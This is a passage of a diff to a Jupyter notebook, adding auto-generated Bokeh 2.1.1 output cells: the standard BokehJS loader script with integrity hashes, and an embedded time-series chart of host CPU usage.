(js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2865\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"0042f7fe-4baa-437e-956d-0c722aca308a\" data-root-id=\"2867\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"44438c05-e52a-4302-87e2-6055c7c19104\":{\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"2878\"}],\"center\":[{\"id\":\"2881\"},{\"id\":\"2885\"}],\"left\":[{\"id\":\"2882\"}],\"min_border_left\":50,\"plot_height\":400,\"plot_width\":900,\"renderers\":[{\"id\":\"2905\"}],\"title\":{\"id\":\"2868\"},\"toolbar\":{\"id\":\"2892\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"2870\"},\"x_scale\":{\"id\":\"2874\"},\"y_range\":{\"id\":\"2872\"},\"y_scale\":{\"id\":\"2876\"}},\"id\":\"2867\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2914\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2874\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis\":{\"id\":\"2882\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2885\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2913\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"2888\",\"type\":\"ResetTool\"},{\"attributes\":{\"source\":{\"id\":\"2901\"}},\"id\":\"2906\",\"type\":\"CDSView\"},{\"attributes\":{\"axis\":{\"id\":\"2878\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2881\",\"type\":\"Grid\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"Data\",\"@Data\"],[\"Time\",\"@Time{%F %T}\"]]},\"id\":\"2866\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"2909\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"2883\",\"type\":\"BasicTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"2901\"},\"glyph\":{\"id\":\"2903\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2904\"},\"selection_glyph\":null,\"view\":{\"id\":\"2906\"}},\"id\":\"2905\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2872\",\"type\":\"DataRange1d\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2916\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2922\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2921\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis_label\":\"Data\",\"formatter\":{\"id\":\"2909\"},\"ticker\":{\"id\":\"2883\"}},\"id\":\"2882\",\"type\":\"LinearAxis\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"2891\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"data\":{\"Data\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7FG4HgUzokDhehSuR915QK5H4XoUenlASOF6FK6nSEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApXI/C9ZaKQK5H4XoUunRASOF6FK5fd0DsUbgehaN5QIXrUbgeeXRAmpmZmZmldED2KFyPwtF0QDMzMzMz/3ZAPQrXo3BFdUApXI/C9Wh1QClcj8L1HHZAexSuR+FOdUCamZmZmWl3QLgehetRWHVASOF6FK77dEDsUbgehU91QFK4HoXreXVAXI/C9Sikd0DhehSuRxmFQNejcD0K23pAzczMzMxMOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUrgehesXiUBmZmZmZu5zQLgehetRrHNAcT0K16OEcUAfhetRuPJxQD0K16NwTXRAKVyPwvUoI0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[240]},\"Time\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[240]},\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"2912\"},\"selection_policy\":{\"id\":\"2913\"}},\"id\":\"2901\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2919\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2917\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2915\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"line_alpha\":0.7,\"line_color\":\"navy\",\"line_width\":2,\"x\":{\"field\":\"Time\"},\"y\":{\"field\":\"Data\"}},\"id\":\"2903\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"2912\",\"type\":\"Selection\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"navy\",\"line_width\":2,\"x\":{\"field\":\"Time\"},\"y\":{\"field\":\"Data\"}},\"id\":\"2904\",\"type\":\"Line\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"2899\"},\"ticker\":{\"id\":\"2879\"}},\"id\":\"2878\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"2925\",\"type\":\"YearsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2890\",\"type\":\"PanTool\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"2914\"},{\"id\":\"2915\"},{\"id\":\"2916\"},{\"id\":\"2917\"},{\"id\":\"2918\"},{\"id\":\"2919\"},{\"id\":\"2920\"},{\"id\":\"2921\"},{\"id\":\"2922\"},{\"id\":\"2923\"},{\"id\":\"2924\"},{\"id\":\"2925\"}]},\"id\":\"2879\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2924\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1595285640000.0,\"start\":1594253160000.0},\"id\":\"2870\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2876\",\"type\":\"LinearScale\"},{\"attributes\":{\"overlay\":{\"id\":\"2891\"}},\"id\":\"2887\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"2889\",\"type\":\"SaveTool\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2920\",\"type\":\"DaysTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"2866\"},{\"id\":\"2886\"},{\"id\":\"2887\"},{\"id\":\"2888\"},{\"id\":\"2889\"},{\"id\":\"2890\"}]},\"id\":\"2892\",\"type\":\"Toolbar\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2918\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2923\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2899\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2886\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"text\":\"Host CPU Usage\"},\"id\":\"2868\",\"type\":\"Title\"}],\"root_ids\":[\"2867\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n",
+       "  var render_items = [{\"docid\":\"44438c05-e52a-4302-87e2-6055c7c19104\",\"root_ids\":[\"2867\"],\"roots\":{\"2867\":\"0042f7fe-4baa-437e-956d-0c722aca308a\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2867"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"3040\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
